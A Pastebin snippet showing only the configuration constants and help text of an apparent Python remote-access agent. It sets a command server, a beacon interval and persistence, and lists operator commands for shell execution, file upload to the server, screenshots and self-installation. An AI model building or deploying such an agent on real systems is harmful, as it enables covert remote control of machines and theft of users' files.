Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SERVER = "http://localhost:8080"
- HELLO_INTERVAL = 2
- IDLE_TIME = 60
- MAX_FAILED_CONNECTIONS = 10
- PERSIST = True
- HELP = """
- <any shell command>
- Executes the command in a shell and return its output.
- upload <local_file>
- Uploads <local_file> to server.
- download <url> <destination>
- Downloads a file through HTTP(S).
- zip <archive_name> <folder>
- Creates a zip archive of the folder.
- screenshot
- Takes a screenshot.
- python <command|file>
- Runs a Python command or local file.
- persist
- Installs the agent.
- clean
- Uninstalls the agent.
- exit
- Kills the agent.
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement